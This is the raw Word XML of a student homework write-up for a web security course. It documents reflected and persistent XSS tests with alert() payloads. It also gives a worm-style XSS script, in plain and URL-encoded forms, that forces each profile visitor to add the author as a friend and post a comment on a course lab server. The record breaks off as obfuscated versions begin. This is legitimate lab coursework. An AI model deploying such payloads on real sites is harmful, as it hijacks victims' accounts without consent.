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EE5FD2A" w14:textId="3FFE978C" w:rsidR="0046286D" w:rsidRPr="00421E6C" w:rsidRDefault="0046286D" w:rsidP="0046286D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E6C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Homework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="00421E6C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD51992" w14:textId="262F560A" w:rsidR="007E1DC4" w:rsidRDefault="00CE77F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1"/>
      <w:r w:rsidR="007E1DC4" w:rsidRPr="0046286D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTIVITY </w:t>
      </w:r>
      <w:r w:rsidR="0046286D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1 – STEP 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB2AFD" w14:textId="77777777" w:rsidR="0046286D" w:rsidRPr="0046286D" w:rsidRDefault="0046286D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D42C3F7" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4">
      <w:r>
        <w:t>I entered the following code into the search box on my profile page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564B0FA" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4">
      <w:r>
        <w:t>&lt;script&gt;alert("REFLECTED XSS IS WORKING")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E61CEB" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="60F042C1" w14:textId="2541B099" w:rsidR="007E1DC4" w:rsidRDefault="0046286D">
      <w:r>
        <w:t xml:space="preserve">As far as I can tell, the actual issue is in the code on the home.php page where the input isn’t being validated correctly. </w:t>
      </w:r>
      <w:r w:rsidR="007E1DC4">
        <w:t>The picture below shows reflected XSS is working as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DC8B7" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="00123137">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251657216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="722D981B" wp14:editId="6792F8D2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>41910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3862705" cy="160020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160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A162E" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="5A41CCBC" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="295822F6" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="354208F7" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="415EBE27" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="6AB1B083" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="3DCD8355" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="10342362" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="199E90FF" w14:textId="679C5F82" w:rsidR="007E1DC4" w:rsidRDefault="0046286D">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD9615" w14:textId="03973C9C" w:rsidR="0046286D" w:rsidRDefault="0046286D" w:rsidP="0046286D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1"/>
      <w:r w:rsidRPr="0046286D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTIVITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">1 – STEP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCE2C5" w14:textId="77777777" w:rsidR="0046286D" w:rsidRPr="0046286D" w:rsidRDefault="0046286D" w:rsidP="0046286D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7C49C5" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4">
      <w:r>
        <w:t>I entered the following code into the Posts box on my profile page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426E801" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4">
      <w:r>
        <w:t>&lt;script&gt;alert("PERSISTENT XSS IS WORKING")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F353F" w14:textId="77777777" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="7DCA8547" w14:textId="3180CB9D" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4">
      <w:r>
        <w:t>This alert box pops up every time I refresh the page.</w:t>
      </w:r>
      <w:r w:rsidR="00B20F8A">
        <w:t xml:space="preserve"> The issue is that any post formatted correctly with the script tag is run whenever the profile is visited.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The picture below shows persistent XSS is working as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67FB5D" w14:textId="1551818B" w:rsidR="001073A6" w:rsidRDefault="0046286D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D5EAC2F" wp14:editId="1FEDAEE0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>43180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4597400" cy="2936240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936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30150" w14:textId="166E020E" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="4EF654CB" w14:textId="3AE737D3" w:rsidR="007E1DC4" w:rsidRDefault="007E1DC4"/>
    <w:p w14:paraId="5B1FDDF7" w14:textId="4A7CDBB1" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="70932DFC" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="595813E8" w14:textId="1B2A4B44" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="230092C2" w14:textId="7B9163D3" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="680AF065" w14:textId="14A5366F" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="06B53D51" w14:textId="0B23B211" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="71FE121B" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="3B09932A" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="795F87BF" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="60E7B441" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="33FB03D8" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="3FCF5454" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="0FE2F2B6" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="56F534EA" w14:textId="77777777" w:rsidR="001073A6" w:rsidRDefault="001073A6"/>
    <w:p w14:paraId="7C5A95BF" w14:textId="0DA14A86" w:rsidR="0046286D" w:rsidRDefault="0046286D" w:rsidP="0046286D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1"/>
      <w:r w:rsidRPr="0046286D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTIVITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> – STEP 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601010D" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101" w:rsidP="00851E6B"/>
    <w:p w14:paraId="5F922584" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00822101" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">My Profile Page - </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00851E6B" w:rsidRPr="00087284">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://csec380-core.csec.rit.ed</w:t>
        </w:r>
        <w:r w:rsidR="00851E6B" w:rsidRPr="00087284">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r w:rsidR="00851E6B" w:rsidRPr="00087284">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r w:rsidR="00851E6B" w:rsidRPr="00087284">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00851E6B" w:rsidRPr="00087284">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>6/home.php?id=93</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04B611F9" w14:textId="77777777" w:rsidR="003F173E" w:rsidRDefault="003F173E" w:rsidP="00851E6B"/>
    <w:p w14:paraId="57DC28D7" w14:textId="77777777" w:rsidR="003F173E" w:rsidRDefault="003F173E" w:rsidP="003F173E">
      <w:r>
        <w:t>Here is my unobfuscated script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3417A077" w14:textId="77777777" w:rsidR="003F173E" w:rsidRDefault="003F173E" w:rsidP="003F173E"/>
    <w:p w14:paraId="0973BF57" w14:textId="77777777" w:rsidR="003F173E" w:rsidRDefault="003F173E" w:rsidP="00851E6B">
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>('</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t>', 'http://csec380-core.csec.rit.edu:86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>add_friend.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">=93', true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>("Content-type", "application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">&lt;/script&gt; &lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> d = new Date()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comment ="Friended on "+</w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>d.getMonth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> "-" </w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>d.getDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>('GET', 'http://csec380-core.csec.rit.edu:86/add_comment.php?id=9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3&amp;comment='+comment, true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880125F" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B"/>
    <w:p w14:paraId="244D8EF8" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t>Here is my unobfuscated script</w:t>
      </w:r>
      <w:r w:rsidR="00822101">
        <w:t xml:space="preserve"> with ‘+’ and ‘&amp;’ replaced with their hex representations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E728C5F" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B"/>
    <w:p w14:paraId="1B7FEEE8" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="009A59C7">
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>('</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t>', 'http://csec380-core.csec.rit.edu:86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>add_friend.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">=93', true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>("Content-type", "application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpAddFriend.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidR="00851E6B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">&lt;/script&gt; &lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> d = new Date(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> comment ="Friended on "%2B </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>d.getMonth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">() %2B "-" %2B </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>d.getDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>('GET', 'http://csec380-core.csec.rit.edu:86/add_comment.php?id=9</w:t>
      </w:r>
      <w:r w:rsidR="00851E6B">
        <w:t xml:space="preserve">3%26comment='%2Bcomment, true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>xhttpComment.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A59C7">
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidR="00851E6B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A59C7">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCFE52" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B"/>
    <w:p w14:paraId="25B54092" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1" w:rsidP="00851E6B"/>
    <w:p w14:paraId="357ADE08" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B"/>
    <w:p w14:paraId="45A4AD33" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="599564A1" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="53424BEE" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="3167C254" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="7496D453" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="595C5CC0" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="475F2178" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="2793CBC4" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="6BFCE981" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="6096E8C1" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="186C2DBA" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="0922E47B" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="1AA40719" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="21B0F757" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="1D0D935C" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="2CDAE03A" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="63D8E690" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="131205D2" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="35760528" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="0BB0AE65" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="141F0A86" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="05E36224" w14:textId="3927F4CE" w:rsidR="00822101" w:rsidRDefault="00B20F8A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Below are all of my obfuscated scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38C00A" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="3F2C2BFB" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRPr="00B20F8A" w:rsidRDefault="00851E6B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20F8A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OBFUSCATED CODE 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD59D66" w14:textId="77777777" w:rsidR="00B20F8A" w:rsidRDefault="00B20F8A"/>
    <w:p w14:paraId="3BD978D4" w14:textId="135F5F3F" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD3608" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _0x5db5 = [</w:t>
